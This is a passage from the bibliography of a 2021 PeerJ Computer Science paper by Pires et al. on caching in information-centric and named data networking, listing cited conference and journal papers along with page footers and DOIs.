Wang T, Wang S. 2019. Mobility-driven user-centric ap clustering in mobile edge computing based ultra dense networks. Digital Communications and Networks 6(2):210–216 DOI 10.1016/j.dcan.2019.08.003. Hou R, Zhang L, Wu T, Mao T, Luo J. 2019. Bloom-filter-based request node collaboration caching for named data networking. Cluster Computing 22(3):6681–6692. Hu X, Gong J, Cheng G, Fan C. 2015. Enhancing in-network caching by coupling cache placement, replacement and location. In: 2015 IEEE International Conference on Communications (ICC). Piscataway: IEEE, 5672–5678. Huang L, Guan Y, Zhang X, Guo Z. 2017. On-path collaborative in-network caching for information-centric networks. In: 2017 IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS). Piscataway: IEEE, 175–180. Huang S, Zeng Z, Ota K, Dong M, Wang T, Xiong N. 2020. An intelligent collaboration trust interconnections system for mobile information control in ubiquitous 5g networks. IEEE Transactions on Network Science and Engineering 99:1. Huang W, Song T, Yang Y, Zhang Y. 2018. Cluster-based selective cooperative caching strategy in vehicular named data networking. In: 2018 1st IEEE International Conference on Hot Information-Centric Networking (HotICN). Piscataway: IEEE, 7–12. Ioannidis S, Yeh E. 2016. Adaptive caching networks with optimality guarantees. In: ACM SIGMETRICS Performance Evaluation Review. Vol. 44, ACM, 113–124. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 41/51 http://dx.doi.org/10.1016/j.dcan.2019.08.003 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Ioannidis S, Yeh E. 2018. Adaptive caching networks with optimality guarantees. IEEE/ACM Transactions on Networking 26(2):737–750. Ioannou A, Weber S. 2016. A survey of caching policies and forwarding mechanisms in information-centric networking. IEEE Communications Surveys & Tutorials 18(4):2847–2886. Jeon H, Lee B, Song H. 2013. On-path caching in information-centric networking. In: 2013 15th International Conference on Advanced Communications Technology (ICACT). IEEE, 264–267. Ji J, Zhu K, Niyato D, Wang R. 2020. Probabilistic cache placement in uav-assisted networks with d2d connections: performance analysis and trajectory optimization. IEEE Transactions on Communications 68(10):6331–6345. Jia R, Liu Z, Wang X, Gan X, Wang X, Xu JJ. 2016. Modeling dynamic adaptive streaming over information-centric networking. IEEE Access 4:8362–8374. Jiang S, Zhang XF. 2002. Lirs: an efficient low inter-reference recency set replacement to improve buffer cache performance. ACM SIGMETRICS Performance Evaluation Review 30(1):31–42. Jin H, Xu D, Zhao C, Liang D. 2017. Information-centric mobile caching network frameworks and caching optimization: a survey. EURASIP Journal on Wireless Communications and Networking 2017(1):33. Jin S, Bestavros A. 1999. Temporal locality in web request streams-sources, characteristics, and caching implications. In: Proceedings of SIGMETRICS. Johnson T, Shasha D. 1994. 2q: a low overhead high performance buffer management replacement algoritm. In: Proceedings of the Twentieth International Conference on Very Large Databases, Santiago, Chile. 439–450. Kalghoum A, Gammar SM. 2017. Towards new information centric networking strategy based on software defined networking. In: 2017 IEEE Wireless Communications and Networking Conference (WCNC). Piscataway: IEEE, 1–6. Kalghoum A, Gammar SM, Saidane LA. 2018. Towards a novel cache replacement strategy for named data networking based on software defined networking. Computers & Electrical Engineering 66:98–113. Kalghoum A, Saidane LA. 2019. Fcr-ns: a novel caching and forwarding strategy for named data networking based on software defined networking. Cluster Computing 22(2):1–14. Kang S-J, Lee S-W, Ko Y-B. 2012. A recent popularity based dynamic cache management for content centric networking. In: 2012 Fourth International Conference on Ubiquitous and Future Networks (ICUFN). Piscataway: IEEE, 219–224. Karami A, Guerrero-Zapata M. 2015. An anfis-based cache replacement method for mitigating cache pollution attacks in named data networking. Computer Networks 80:51–65. Khan FH, Khan Z. 2017. Popularity-aware content caching for distributed wireless helper nodes. Arabian Journal for Science and Engineering 42(8):3375–3389. Khan J, Westphal C, Garcia-Luna-Aceves J, Ghamri-Doudane Y. 2018. Nice: network-oriented information-centric centrality for efficiency in cache management. In: ICN ’18: Proceedings of the 5th ACM Conference on Information-Centric Networking. New York: ACM, 31–42. Khelifi H, Luo S, Nour B, Moungla H, Faheem Y, Hussain R, Ksentini A. 2020. Named data networking in vehicular ad hoc networks: state-of-the-art and challenges. IEEE Communications Surveys & Tutorials 22(1):320–351 DOI 10.1109/COMST.2019.2894816. Kim W-S, Chung S-H, Moon J-W. 2015. Improved content management for information-centric networking in sdn-based wireless mesh network. Computer Networks 92:316–329. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 42/51 http://dx.doi.org/10.1109/COMST.2019.2894816 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Kitchenham B, Charters S. 2007. Guidelines for performing systematic literature reviews in software engineering. Technical report, Ver. 2.3, EBSE Technical Report EBSE-2007-01. Available at https://www.elsevier.com/__data/promis_misc/525444systematicreviewsguide.pdf. Koponen T, Chawla M, Chun B-G, Ermolinskiy A, Kim KH, Shenker S, Stoica I. 2007. A data-oriented (and beyond) network architecture. In: Proceedings of the 2007 Conference on Applications, Technologies, Architectures, and Protocols for Computer Communications. 181–192. Lal KN, Kumar A. 2016. A cache content replacement scheme for information centric network. Procedia Computer Science 89:73–81. Lal KN, Kumar A. 2019. A popularity based content eviction scheme via betweenness-centrality caching approach for content-centric networking (ccn). Wireless Networks 25(2):585–596. Laoutaris N, Syntila S, Stavrakakis I. 2004. Meta algorithms for hierarchical web caches. In: IEEE International Conference on Performance, Computing, and Communications. Piscataway: IEEE, 445–452. Lee D, Choi J, Kim J-H, Noh SH, Min SL, Cho Y, Kim CS. 2001. Lrfu: a spectrum of policies that subsumes the least recently used and least frequently used policies. IEEE Transactions on Computers 12:1352–1361. Lee J, Lim K, Yoo C. 2013. Cache replacement strategies for scalable video streaming in ccn. In: 2013 19th Asia-Pacific Conference on Communications (APCC). Piscataway: IEEE, 184–189. Lee JW, Hong CS. 2017. Fera: a caching scheme in ccn using file-extension and regression analysis. In: Network Operations and Management Symposium (APNOMS), 2017 19th Asia-Pacific. Piscataway: IEEE, 303–306. Li B, Ma M, Hu S. 2015a. Perceptive forwarding strategy in content-centric network. In: 2015 IEEE Globecom Workshops (GC Wkshps). Piscataway: IEEE, 1–6. Li H, Nakazato H, Detti A, Melazzi NB. 2015b. Popularity proportional cache size allocation policy for video delivery on ccn. In: 2015 European Conference on Networks and Communications (EuCNC). Piscataway: IEEE, 434–438. Li J, Liu B, Wu H. 2013. Energy-efficient in-network caching for content-centric networking. IEEE Communications Letters 17(4):797–800. Li J, Luo H, Zhang S, Li H, Yan F. 2019. Design and implementation of efficient control for incoming inter-domain traffic with information-centric networking. Journal of Network and Computer Applications 133:109–125. Li T, Liu A, Xiong N, Zhang S, Wang T. 2020a. A trustworthiness-based vehicular recruitment scheme for information collections in distributed networked systems. Information Sciences 545:65–81. Li T, Zhao M, Wong K. 2020b. Machine learning based code dissemination by selection of reliability mobile vehicles in 5g networks. Computer Communications 152:109–118 DOI 10.1016/j.comcom.2020.01.034. Li Y, Yu M, Li R. 2018. A cache replacement strategy based on hierarchical popularity in ndn. In: 2018 Tenth International Conference on Ubiquitous and Future Networks (ICUFN). Piscataway: IEEE, 159–161. Li Z, Simon G, Gravey A. 2012. Caching policies for in-network caching. In: 2012 21st International conference on computer communications and networks (ICCCN). Piscataway: IEEE, 1–7. Liang C, Yu FR, Zhang X. 2015. Information-centric network function virtualization over 5g mobile wireless networks. IEEE Network 29(3):68–74. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 43/51 https://www.elsevier.com/__data/promis_misc/525444systematicreviewsguide.pdf http://dx.doi.org/10.1016/j.comcom.2020.01.034 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Liang Y, Zhou X, Guo B, Yu Z. 2012. Understanding the regularity and variability of human mobility from geo-trajectory. In: 2012 IEEE/WIC/ACM International Conferences on Web Intelligence and Intelligent Agent Technology. Piscataway: IEEE, 409–414. Liu H, Azhandeh K, De Foy X, Gazda R. 2019a. A comparative study of name resolution and routing mechanisms in information-centric networks. Digital Communications and Networks 5(2):69–75. Liu W, Li X, Huang D. 2011. A survey on context awareness. In: 2011 International Conference on Computer Science and Service System (CSSS). Piscataway: IEEE, 144–147. Liu W-X, Zhang J, Liang Z-W, Peng L-X, Cai J. 2018. Content popularity prediction and caching for icn: a deep learning approach with sdn. IEEE Access 6:5075–5089. Liu Y, Zhi T, Xi H, Quan W, Zhang H. 2019b. A novel cache replacement scheme against cache pollution attack in content-centric networks. In: 2019 IEEE/CIC International Conference on Communications in China (ICCC). Piscataway: IEEE, 207–212. Liu Y, Zhu D, Ma W. 2016. A novel cooperative caching scheme for content centric mobile ad hoc networks. In: 2016 IEEE Symposium on Computers and Communication (ISCC). Piscataway: IEEE, 824–829. Liu Z, Dong M, Gu B, Zhang C, Ji Y, Tanaka Y. 2017. Fast-start video delivery in future internet architectures with intra-domain caching. Mobile Networks and Applications 22(1):98–112. Llorca J, Tulino AM, Varvello M, Esteban JO, Perino D. 2015. Energy efficient dynamic content distribution. IEEE Journal on Selected Areas in Communications 33(12):2826–2836. Madureira ALR, Araújo FRC, Araújo GB, Sampaio LN. 2020. Ndn fabric: where the software- defined networking meets the content-centric model. IEEE Transactions on Network and Service Management 99:1. Mangili M, Martignon F, Capone A. 2013. A comparative study of content-centric and content- distribution networks: performance and bounds. In: 2013 IEEE Global Communications Conference (GLOBECOM). Piscataway: IEEE, 1403–1409. Meddeb M, Dhraief A, Belghith A, Monteil T, Drira K. 2017. How to cache in icn-based iot environments? In: 2017 IEEE/ACS 14th International Conference on Computer Systems and Applications (AICCSA). Piscataway: IEEE, 1117–1124. Meddeb M, Dhraief A, Belghith A, Monteil T, Drira K, Mathkour H. 2019. Least fresh first cache replacement policy for ndn-based iot networks. Pervasive and Mobile Computing 52:60–70. Megiddo N, Modha DS. 2003. Arc: a self-tuning, low overhead replacement cache. In: Fast, 3:115–130. Megiddo N, Modha DS. 2004. Outperforming lru with an adaptive replacement cache algorithm. Computer 37(4):58–65. Melazzi NB, Bianchi G, Caponi A, Detti A. 2014. A general, tractable and accurate model for a cascade of lru caches. IEEE Communications Letters 18(5):877–880. Mick T, Tourani R, Misra S. 2016. Muncc: multi-hop neighborhood collaborative caching in information centric networks. In: Proceedings of the 3rd ACM Conference on Information- Centric Networking. New York: ACM, 93–101. Ming Z, Xu M, Wang D. 2012. Age-based cooperative caching in information-centric networks. In: 2012 Proceedings IEEE INFOCOM Workshops. IEEE, 268–273. Moon C, Han S, Woo H, Kim D. 2016. Named data networking for infrastructure wireless networks. In: 2016 IEEE International Conference on Consumer Electronics (ICCE). Piscataway: IEEE, 343–344. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 44/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Nakayama H, Ata S, Oka I. 2015. Caching algorithm for content-oriented networks using prediction of popularity of contents. In: 2015 IFIP/IEEE International Symposium on Integrated Network Management (IM). Piscataway: IEEE, 1171–1176. Naz S, Rais RNB, Qayyum A. 2016. Multi-attribute caching: towards efficient cache management in content-centric networks. In: 2016 13th IEEE Annual Consumer Communications & Networking Conference (CCNC). Piscataway: IEEE, 630–633. Ndikumana A, Tran NH, Ho TM, Niyato D, Han Z, Hong CS. 2018. Joint incentive mechanism for paid content caching and price based cache replacement policy in named data networking. IEEE Access 6:33702–33717. Neves dos Santos F, Ertl B, Barakat C, Spyropoulos T, Turletti T. 2013. Cedo: Content-centric dissemination algorithm for delay-tolerant networks. In: Proceedings of the 16th ACM International Conference on Modeling, Analysis & Simulation of Wireless and Mobile Systems. New York: ACM, 377–386. Newberry E, Zhang B. 2019. On the power of in-network caching in the hadoop distributed file system. In: Proceedings of the 6th ACM Conference on Information-Centric Networking, 89–99. O’neil EJ, O’neil PE, Weikum G. 1993. The lru-k page replacement algorithm for database disk buffering. ACM Sigmod Record 22(2):297–306. Ong MD, Chen M, Taleb T, Wang X, Leung V. 2014. Fgpc: fine-grained popularity-based caching design for content centric networking. In: Proceedings of the 17th ACM International Conference on Modeling, Analysis and Simulation of Wireless and Mobile Systems. New York: ACM, 295–302. Ostrovskaya S, Surnin O, Hussain R, Bouk SH, Lee J, Mehran N, Ahmed SH, Benslimane A. 2018. Towards multi-metric cache replacement policies in vehicular named data networks. In: 2018 IEEE 29th Annual International Symposium on Personal, Indoor and Mobile Radio Communications (PIMRC). Piscataway: IEEE, 1–7. Pacifici V, Dán G. 2013. Content-peering dynamics of autonomous caches in a content-centric network. In: 2013 Proceedings IEEE INFOCOM. Piscataway: IEEE, 1079–1087. Pal A, Kant K. 2017. Nacid: a neighborhood aware caching and interest dissemination in content centric networks. In: 2017 26th International Conference on Computer Communication and Networks (ICCCN). Piscataway: IEEE, 1–9. Pan T, Huang T, Li C. 2017. Modeling ccn packet forwarding engine. In: GLOBECOM 2017-2017 IEEE Global Communications Conference. Piscataway: IEEE, 1–6. Pan T, Lin X, Zhang J, Li H, Lv J, Huang T, Liu B, Zhang B. 2019. Nb-cache: non-blocking in- network caching for high-speed content routers. In: Proceedings of the International Symposium on Quality of Service. 1–10. Panda P, Patil G, Raveendran B. 2016. A survey on replacement strategies in cache memory for embedded systems. In: 2016 IEEE Distributed Computing, VLSI, Electrical Circuits and Robotics (DISCOVER). Piscataway: IEEE, 12–17. Panigrahi B, Shailendra S, Rath HK, Simha A. 2014. Universal caching model and markov-based cache analysis for information centric networks. In: 2014 IEEE International Conference on Advanced Networks and Telecommuncations Systems (ANTS). Piscataway: IEEE, 1–6. Pentikousis K, Ohlman B, Corujo D, Boggia G, Tyson G, Davies EB, Molinaro A, Eum S. 2015. Information-centric networking: baseline scenarios. RFC 7476. Perera C, Zaslavsky A, Christen P, Georgakopoulos D. 2013. Context aware computing for the internet of things: a survey. IEEE Communications Surveys & Tutorials 16(1):414–454. Petersen K, Feldt R, Mujtaba S, Mattsson M. 2008. Systematic mapping studies in software engineering. In: Ease, 8:68–77. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 45/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Pires SS, Ribeiro AV, de Sousa AM, Freitas AE, Sampaio LN. 2018. On evaluating the influence of user’s music listening habits on cache replacement policies. In: 2018 IEEE Symposium on Computers and Communications (ISCC). Piscataway: IEEE, 00930–00933. Podlipnig S, Böszörmenyi L. 2003. A survey of web cache replacement strategies. ACM Computing Surveys 35(4):374–398. Psaras I, Ascigil O, Rene S, Pavlou G, Afanasyev A, Zhang L. 2018. Mobile data repositories at the edge. In: {USENIX} Workshop on Hot Topics in Edge Computing (HotEdge 18). Psaras I, Chai WK, Pavlou G. 2012. Probabilistic in-network caching for information-centric networks. In: Proceedings of the Second Edition of the ICN Workshop on Information-Centric Networking. 55–60. Qian H, Muqing W, Dongyang W, Song G. 2014. Lifetime-based greedy caching approach for content-centric networking. In: 2014 21st International Conference on Telecommunications (ICT). Piscataway: IEEE, 426–430. Qu D, Wang X, Huang M, Li K, Das SK, Wu S. 2018. A cache-aware social-based qos routing scheme in information centric networks. Journal of Network and Computer Applications 121:20–32. Quevedo J, Corujo D, Aguiar R. 2014. A case for icn usage in iot environments. In: 2014 IEEE Global Communications Conference. Piscataway: IEEE, 2770–2775. Rahman A, Trossen D, Kutscher D, Ravindran R. 2020. Deployment Considerations for information-centric networking (ICN). RFC 8763. Available at https://rfc-editor.org/rfc/rfc8763.txt. Ran J, Lv N, Zhang D, yuan Ma Y, yong Xie Z. 2013. On performance of cache policies in named data networking. In: 2013 International Conference on Advanced Computer Science and Electronics Information (ICACSEI 2013). Paris: Atlantis Press. Rao A, Schelen O, Lindgren A. 2016. Performance implications for iot over information centric networks. In: Proceedings of the Eleventh ACM Workshop on Challenged Networks. New York: ACM, 57–62. Rath HK, Panigrahi B, Simha A. 2016. On cooperative on-path and off-path caching policy for information centric networks (icn). In: 2016 IEEE 30th International Conference on Advanced Information Networking and Applications (AINA). Piscataway: IEEE, 842–849. Ravi A, Ramanathan P, Sivalingam KM. 2014. Integrated network coding and caching in information-centric networks. In: 2014 IEEE International Conference on Advanced Networks and Telecommuncations Systems (ANTS). Piscataway: IEEE, 1–6. Raychaudhuri D, Nagaraja K, Venkataramani A. 2012. Mobilityfirst: a robust and trustworthy mobility-centric architecture for the future internet. ACM SIGMOBILE Mobile Computing and Communications Review 16(3):2–13. Ren J, Qi W, Westphal C, Wang J, Lu K, Liu S, Wang S. 2014. Magic: a distributed max-gain in- network caching strategy in information-centric networks. In: 2014 IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS). Piscataway: IEEE, 470–475. Rezazad M, Tay Y. 2015. Ccndns: a strategy for spreading content and decoupling ndn caches. In: IFIP Networking Conference (IFIP Networking). Piscataway: IEEE, 1–9. Rhaiem OB, Fourati LC, Ajib W. 2016. New hierarchical parent-child caching strategy (h-cs) for ccn-based video streaming. In: 2016 IEEE 30th International Conference on Advanced Information Networking and Applications (AINA). Piscataway: IEEE, 109–115. Ribeiro AV, Sampaio LN, Ziviani A. 2018. Affinity-based user clustering for efficient edge caching in content-centric cellular networks. In: 2018 IEEE Symposium on Computers and Communications (ISCC). Piscataway: IEEE, 474–479. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 46/51 https://rfc-editor.org/rfc/rfc8763.txt http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Rocha AA, Dehghan M, Salonidis T, He T, Towsley D. 2016. Dsca: a data stream caching algorithm. In: Proceedings of the 1st Workshop on Content Caching and Delivery in Wireless Networks. New York: ACM, 8. Rosário D, Seruffo M, Cerqueira E, Both C, Braun T, Gerla M. 2016. Trends in human-centric multimedia networking scenarios. In: 2016 Mediterranean Ad Hoc Networking Workshop (Med- Hoc-Net). Piscataway: IEEE, 1–5. Rossi D, Rossini G. 2011. Caching performance of content centric networks under multi-path routing (and more). Relatório técnico, Telecom ParisTech, 1–6. Available at https://perso.telecom- paristech.fr/drossi/paper/rossi11ccn-techrep1.pdf. Saadeh H, Almobaideen W, Sabri KE, Saadeh M. 2019. Hybrid sdn-icn architecture design for the internet of things. In: 2019 Sixth International Conference on Software Defined Systems (SDS). Piscataway: IEEE, 96–101. Sadeghi A, Sheikholeslami F, Giannakis GB. 2017. Optimal and scalable caching for 5g using reinforcement learning of space-time popularities. IEEE Journal of Selected Topics in Signal Processing 12(1):180–190. Safavat S, Naveen NNS, Rawat DB. 2019. Recent advances in mobile edge computing and content caching. Digital Communications and Networks 6(2):189–194. Saltarin J, Braun T, Bourtsoulatze E, Thomos N. 2018. Popnetcod: a popularity-based caching policy for network coding enabled named data networking. In: 2018 IFIP Networking Conference (IFIP Networking) and Workshops. Piscataway: IEEE, 271–279. Saxena D, Raychoudhury V, Suri N, Becker C, Cao J. 2016. Named data networking: a survey. Computer Science Review 19:15–55. Sertbaş N, Aytaç S, Ermiş O, Alagöz F, Gür G. 2018. Attribute based content security and caching in information centric iot. In: Proceedings of the 13th International Conference on Availability, Reliability and Security. New York: ACM, 34. Shafigh AS, Glisic S, Hossain E, Lorenzo B, DaSilva LA. 2019. User-centric distributed spectrum sharing in dynamic network architectures. IEEE/ACM Transactions on Networking 27(1):15–28. Shailendra S, Sengottuvelan S, Rath HK, Panigrahi B, Simha A. 2016. Performance evaluation of caching policies in ndn-an icn architecture. In: 2016 IEEE Region 10 Conference (TENCON). Piscataway: IEEE, 1117–1121. Shariat A, Tizghadam A, Leon-Garcia A. 2016. An icn-based publish-subscribe platform to deliver uav service in smart cities. In: 2016 IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS). Piscataway: IEEE, 698–703. Shukla S, Abouzeid AA. 2017. Optimal device-aware caching. IEEE Transactions on Mobile Computing 16(7):1994–2007. Sinky H, Khalfi B, Hamdaoui B, Rayes A. 2018. Responsive content-centric delivery in large urban communication networks: a linknyc use-case. IEEE Transactions on Wireless Communications 17(3):1688–1699. Sri Prakash R, Moharir S. 2018. Poster: caching static and transient data. In: Proceedings of the 24th Annual International Conference on Mobile Computing and Networking. ACM, 678–680. Sun X, Wang Z. 2015. An optimized cache replacement algorithm for information-centric networks. In: 2015 IEEE International Conference on Smart City/SocialCom/SustainCom (SmartCity). Piscataway: IEEE, 683–688. Sun Y, Fayaz SK, Guo Y, Sekar V, Jin Y, Kaafar MA, Uhlig S. 2014. Trace-driven analysis of icn caching algorithms on video-on-demand workloads. In: Proceedings of the 10th ACM International on Conference on emerging Networking Experiments and Technologies. New York: ACM, 363–376. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 47/51 https://perso.telecom-paristech.fr/drossi/paper/rossi11ccn-techrep1.pdf https://perso.telecom-paristech.fr/drossi/paper/rossi11ccn-techrep1.pdf http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Sung J, Kim K, Kim J, Rhee J-KK. 2016. Efficient content replacement in wireless content delivery network with cooperative caching. In: 2016 15th IEEE International Conference on Machine Learning and Applications (ICMLA). Piscataway: IEEE, 547–552. Sureshjani MH, Moghim N. 2018. Cache replacement policy discard of fast retrievable content in named data networking of things. In: Proceedings of the International Conference on Smart Cities and Internet Of Things. New York: ACM, 6. Tang Y, Guo K, Ma J, Shen Y, Chi T. 2019. A smart caching mechanism for mobile multimedia in information centric networking with edge computing. Future Generation Computer Systems 91:590–600. Tarnoi S, Kumwilaisak W, Suppakitpaisarn V, Fukuda K, Ji Y. 2019. Adaptive probabilistic caching technique for caching networks with dynamic content popularity. Computer Communications 139:1–15. Tarnoi S, Suksomboon K, Kumwilaisak W, Ji Y. 2014. Performance of probabilistic caching and cache replacement policies for content-centric networks. In: 39th Annual IEEE Conference on Local Computer Networks. Piscataway: IEEE, 99–106. Tarnoi S, Suppakitpaisarn V, Kumwilaisak W, Ji Y. 2015. Performance analysis of probabilistic caching scheme using markov chains. In: 2015 IEEE 40th Conference on Local Computer Networks (LCN). Piscataway: IEEE, 46–54. Thomas Y, Xylomenos G. 2014. Towards improving the efficiency of icn packet-caches. In: 2014 10th International Conference on Heterogeneous Networking for Quality, Reliability, Security and Robustness (QShine). Piscataway: IEEE, 186–187. Tyson G, Sastry N, Rimac I, Cuevas R, Mauthe A. 2012. A survey of mobility in information- centric networks: challenges and research directions. In: Proceedings of the 1st ACM workshop on Emerging Name-Oriented Mobile Networking Design-Architecture, Algorithms, and Applications. New York: ACM, 1–6. Van Adrichem NL, Kuipers FA. 2013. Globally accessible names in named data networking. In: 2013 IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS). Piscataway: IEEE, 345–350. Van Engelenburg S, Janssen M, Klievink B. 2019. Designing context-aware systems: a method for understanding and analysing context in practice. Journal of Logical and Algebraic Methods in Programming 103:79–104. Vieira V, Tedesco P, Salgado AC. 2011. Designing context-sensitive systems: an integrated approach. Expert Systems with Applications 38(2):1119–1138. Vural S, Wang N, Navaratnam P, Tafazolli R. 2017. Caching transient data in internet content routers. IEEE/ACM Transactions on Networking 25(2):1048–1061. Wang G-Q, Huang T, Jiang L, Xie R-C, Liu Y-J. 2014a. In-network caching for energy efficiency in content-centric networking. Journal of China Universities of Posts and Telecommunications 21(4):25–31. Wang H, Chen Z, Xie F, Han F. 2012a. A data structure for content cache management in content-centric networking. In: 2012 Third International Conference on Networking and Distributed Computing (ICNDC). Piscataway: IEEE, 11–15. Wang J. 1999. A survey of web caching schemes for the internet. ACM SIGCOMM Computer Communication Review 29(5):36–46. Wang JM, Bensaou B. 2012a. Improving content-centric networks performance with progressive, diversity-load driven caching. In: 2012 1st IEEE International Conference on Communications in China (ICCC). Piscataway: IEEE, 85–90. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 48/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Wang JM, Bensaou B. 2012b. Progressive caching in ccn. In: 2012 IEEE Global Communications Conference (GLOBECOM). Piscataway: IEEE, 2727–2732. Wang L, Bayhan S, Kangasharju J. 2015. Optimal chunking and partial caching in information- centric networks. Computer Communications 61:48–57. Wang S, Bi J, Wu J. 2012b. On performance of cache policy in information-centric networking. In: 2012 21st International Conference on Computer Communications and Networks (ICCCN). Piscataway: IEEE, 1–7. Wang S, Bi J, Wu J, Li Z, Zhang W, Yang X. 2011. Could in-network caching benefit information- centric networking? In: Proceedings of the 7th Asian Internet Engineering Conference. New York: ACM, 112–115. Wang W, Sun Y, Guo Y, Kaafar D, Jin J, Li J, Li Z. 2014b. Crcache: exploiting the correlation between content popularity and network topology information for icn caching. In: 2014 IEEE International Conference on Communications (ICC). Piscataway: IEEE, 3191–3196. Wei T, Chang L, Yu B, Pan J. 2014. Mpcs: a mobility/popularity-based caching strategy for information-centric networks. In: 2014 IEEE Global Communications Conference (GLOBECOM). Piscataway: IEEE, 4629–4634. Williamson C. 2002. On filter effects in web caching hierarchies. ACM Transactions on Internet Technology (TOIT) 2(1):47–77. Wood S, Mathewson J, Joy J, Stehr M-O, Kim M, Gehani A, Gerla M, Sadjadpour H, Garcia-Luna-Aceves J. 2013. Iceman: a system for efficient, robust and secure situational awareness at the network edge. In: MILCOM 2013-2013 IEEE Military Communications Conference. Piscataway: IEEE, 1512–1517. Wu T-Y, Lee W-T, Duan C-Y, Wu Y-W. 2014. Data lifetime enhancement for improving qos in ndn. Procedia Computer Science 32:69–76. Xin Y, Li Y, Wang W, Li W, Chen X. 2016. Content aware multi-path forwarding strategy in information centric networking. In: 2016 IEEE Symposium on Computers and Communication (ISCC). Piscataway: IEEE, 816–823. Xing L, Zhang Z, Lin H, Gao F. 2017. Content centric network with label aided user modeling and cellular partition. IEEE Access 5:12576–12583. Xylomenos G, Ververidis CN, Siris VA, Fotiou N, Tsilopoulos C, Vasilakos X, Katsaros KV, Polyzos GC. 2013. A survey of information-centric networking research. IEEE Communications Surveys & Tutorials 16(2):1024–1049. Yang J-Y, Choi H-K. 2018. Ppndn: popularity-based caching for privacy preserving in named data networking. In: 2018 IEEE/ACIS 17th International Conference on Computer and Information Science (ICIS). Piscataway: IEEE, 39–44. Yanuar MR, Manaf A. 2017. Performance evaluation of progressive caching policy on ndn. In: 2017 International Conference on Advanced Informatics, Concepts, Theory, and Applications (ICAICTA). Piscataway: IEEE, 1–6. Yao H, Qiu C, Fang C, Chen X, Yu FR. 2016. A novel framework of data-driven networking. IEEE Access 4:9066–9072. Yao L, Chen A, Deng J, Wang J, Wu G. 2018. A cooperative caching scheme based on mobility prediction in vehicular content centric networks. IEEE Transactions on Vehicular Technology 67(6):5435–5444. Yao L, Wang Y, Xia Q, Xu R. 2019. Popularity prediction caching using hidden markov model for vehicular content centric networks. In: 2019 20th IEEE International Conference on Mobile Data Management (MDM). Piscataway: IEEE, 533–538. Pires et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.418 49/51 http://dx.doi.org/10.7717/peerj-cs.418 https://peerj.com/computer-science/ Yeh E, Ho T, Cui Y, Burd M, Liu R, Leong D. 2015. Vip: joint traffic engineering and caching in named data networks. In: 2015 International Conference on Computing, Networking and Communications (ICNC). Piscataway: IEEE, 695–699. Yokota K, Sugiyama K, Kurihara J, Tagami A. 2016. Rtt-based caching policies to improve user- centric performance in ccn. In: 2016 IEEE 30th International Conference on Advanced Information Networking and Applications (AINA). IEEE, 124–131. Zaidi S, Ben Smida O, Affes S, Vilaipornsawai U, Zhang L, Zhu P. 2019. User-centric base- station wireless access virtualization for future 5g networks. IEEE Transactions on Communications 67(7):5190–5202. Zeng Y, Xie J, Jiang H, Huang G, Yi S, Xiong N, Li J. 2019. Smart caching based on user behavior for mobile edge computing. Information Sciences 503:444–468. Zhang L, Estrin D, Burke J, Jacobson V, Thorton JD, Smetters DK, Zhang B, Tsudik G, Claffy KC, Krioukov D, Massey D, Papadopoulos C, Abdelzaher T, Wang L, Crowley P, Yeh E. 2010. Named Data Networking (NDN) Project. Available at https://named-data.net/ techreport/TR001ndn-proj.pdf. Zhang G, Li Y, Lin T. 2013. Caching in information centric networking: a survey. Computer Networks 57(16):3128–3141. Zhang G, Liu J, Chang X, Chen Z. 2017a. Combining popularity and locality to enhance in- network caching performance and mitigate pollution attacks in content-centric networking. IEEE Access 5:19012–19022. Zhang H, Xie R, Zhu S, Huang T, Liu Y. 2016. Dena: an intelligent content discovery system used in named data networking. IEEE Access 4:9093–9107. Zhang L, Afanasyev A, Burke J, Jacobson V, Claffy KC, Crowley P, Papadopoulos C, Wang L, Zhang B. 2014. Named data networking. ACM SIGCOMM Computer Communication Review 44(3):66–73. Zhang M, Luo H, Zhang H. 2015. A survey of caching mechanisms in information-centric networking. IEEE Communications Surveys & Tutorials 17(3):1473–1499. Zhang Q, Wang X, Huang M, Li K, Das SK. 2018. Software defined networking meets information centric networking: a survey. IEEE Access 6:39547–39563. Zhang T, Wang Z, Liu Y, Xu W, Nallanathan A. 2020. Caching placement and resource allocation for cache-enabling uav noma networks. IEEE Transactions on Vehicular Technology 69(11):12897–12911. Zhang Y, Tan X, Li W. 2017b. In-network cache size allocation for video streaming on named data networking. In: Proceedings of the 2017 VI International Conference on Network, Communication and Computing. New York: ACM, 18–23. Zhang Y, Tan X, Li W. 2018. Ppc: popularity prediction caching in icn. IEEE Communications Letters 22(1):5–8. Zhang Z, Lung C-H, Lambadaris I, St-Hilaire M. 2018. When 5g meets icn: an icn-based caching approach for mobile video in 5g networks. Computer Communications 118:81–92. Zhang Z, Ma H, Xue Y, Liu L. 2017c. Fair video caching for named data networking. In: 2017 IEEE International Conference on Communications (ICC). Piscataway: IEEE, 1–6. Zhao W, Qin Y, Gao D, Foh CH, Chao H-C. 2017. An efficient cache strategy in information centric networking vehicle-to-vehicle scenario. IEEE Access 5:12657–12667. Zhou X, Ye Z. 2017. Popularity and age based cache scheme for content-centric network. In: 2017 3rd International Conference on Information Management (ICIM). Piscataway: IEEE, 322–326. Pires et 